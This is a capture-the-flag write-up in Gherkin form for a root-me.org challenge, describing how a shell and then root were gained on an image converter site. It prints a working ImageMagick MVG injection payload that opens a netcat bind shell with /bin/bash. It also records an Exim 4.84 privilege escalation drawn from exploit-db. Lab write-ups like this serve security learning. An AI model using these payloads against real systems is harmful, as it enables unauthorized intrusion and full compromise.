## Version 2.0
## language: en

Feature:
  Site:
    root-me.org
  Category:
    Realist, CTF
  User:
    mr_once
  Goal:
    Get a root shell

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Arch Linux      | 2020.07.01  |
    | Firefox         | 78.0.2      |
  Machine information:
    Given I am accessing the at http://ctf16.root-me.org/
    And it looks like an image converter utility [evidence](site.png)

  Scenario: Fail:Try to bypass the uploader
    Given there are three uploaders
    Then I try to bypass them to gain CE
    But neither changing the extension nor the mime-type worked

  Scenario: Success:Find an exploit for imagemagick
    Given I can see the site is powered by imagemagick
    Then I look for exploits
    And I found this article
    """
    https://rhinosecuritylabs.com/research/imagemagick-exploit-remediation/
    """
    And based on that, I write the exploit
    """
    push graphic-context
    viewbox 0 0 100 100
    fill 'url(https://example.com/image.jpg "|nc -nlvp 5000 -e /bin/bash")'
    pop graphic-context
    """
    When I upload the exploit as a "mvg" file
    And connect via netcat
    Then I get a remote shell [evidence](remote.png)

  Scenario: Fail:Privilege scalation with sudo
    Given now that I have a shell
    When I try to see what commands can I run with "sudo"
    """
    $ sudo -l
    """
    Then I get
    """
    bash: sudo: command not found
    """

  Scenario: Fail:Local kernel exploitation
    Given the machine's kernel is
    """
    $ uname -r
    3.16.0-4-amd64
    """
    Then I try to look for exploits
    But I realize there is no C or CPP compiler installed in the machine

  Scenario: Fail:Exploit root's running processes
    Given nothing has worked so far
    Then I try to exploit some processe running as root
    """
    $ ps -aux | grep root
    ...
    root 149  ... Ss   18:05   0:00 /lib/systemd/systemd-udevd
    root 165  ... Ss   18:05   0:00 /lib/systemd/systemd-journald
    root 396  ... Ss   18:05   0:00 dhclient -v -pf /run/dhclient.eth0.
      pid -lf /var/lib/dhcp/dhclient.eth0.leases eth0
    root 417  ...   18:05   0:00 /sbin/rpcbind -w
    root 440  ...   18:05   0:00 /usr/sbin/rpc.idmapd
    root 442  ...   18:05   0:00 /usr/sbin/cron -f
    root 443  ...   18:05   0:00 /usr/sbin/sshd -D
    root 445  ...   18:05   0:00 /lib/systemd/systemd-logind
    root 476  ...  18:05   0:00 /usr/sbin/rsyslogd -n
    root 477  ...   18:05   0:00 /usr/sbin/acpid
    root 699  ...   18:05   0:00 /usr/sbin/apache2 -k start
    root 736  ...   18:05   0:00 /usr/bin/python /usr/bin/
        fail2ban-server -b -s /var/run/fail2ban/fail2ban.sock
        -p /var/run/fail2ban/fail2ban.pid
    """
    And I try to find a way to exploit each of this processes
    But it did not work

  Scenario: Fail:Privilege escalation with cronjobs
    Given as stated before I can see that "cron" is running as root
    Then I go to "/etc/cron.d" and I only find a single file
    """
    $ ls /etc/cron.d
    php
    """
    But I don't have writing acces neither on the file nor the folder

  Scenario: Fail:Exploit processes not owned by root
    Given that I could not exploit root's processes
    Then I moved to non root processes
    """
    $ ps -aux | grep -v root | grep -v "www-data"
    statd      ...   18:05   0:00 /sbin/rpc.statd
    daemon     ...   18:05   0:00 /usr/sbin/atd -f
    message+   ...   18:05   0:00 /usr/bin/dbus-daemon --system
      --address=systemd: --nofork --nopidfile --systemd-activation
    Debian-+   ...   18:05   0:00 /usr/sbin/exim4 -bd -q30m
    """
    When I take a closer look at "exim4"
    """
    $ exim4 --version
    """
    Then I see that the version is
    """
    Exim version 4.84 #2 built 17-Feb-2015 17:45:46
    Copyright (c) University of Cambridge, 1995 - 2014
    ...
    """
    When looking for exploits I find
    """
    https://www.exploit-db.com/exploits/39535
    """
    Then I move to "/tmp" where I have write access
    """
    $ cd /tmp
    """
    And I create a new file using vim
    """
    $ vim exploit.sh
    """
    When I run the exploit
    """
    chmod 777 exploit.sh && ./exploit.sh
    """
    Then I get
    """
    ./exploit.sh: line 24: /usr/exim/bin/exim: No such file or directory
    """

  Scenario: Success:Run exim4's exploit with the right path
    Given that the exploit failed because exim4's path was wrong
    Then I search for the correct location
    """
    $ whereis exim4
    exim4: /usr/sbin/exim4 /usr/lib/exim4 /etc/exim4 \
      /usr/share/man/man8/exim4.8.gz
    """
    And I see that the right path is "/usr/sbin/exim4"
    When I modify the exploit and run it
    Then I get a root shell [evidence](root.png)
    And I can read the flag
    """
    $ cat /passwd
    108687e2f91fc8b9bcc0c45856ce8e70
    """
    And I solve the challenge
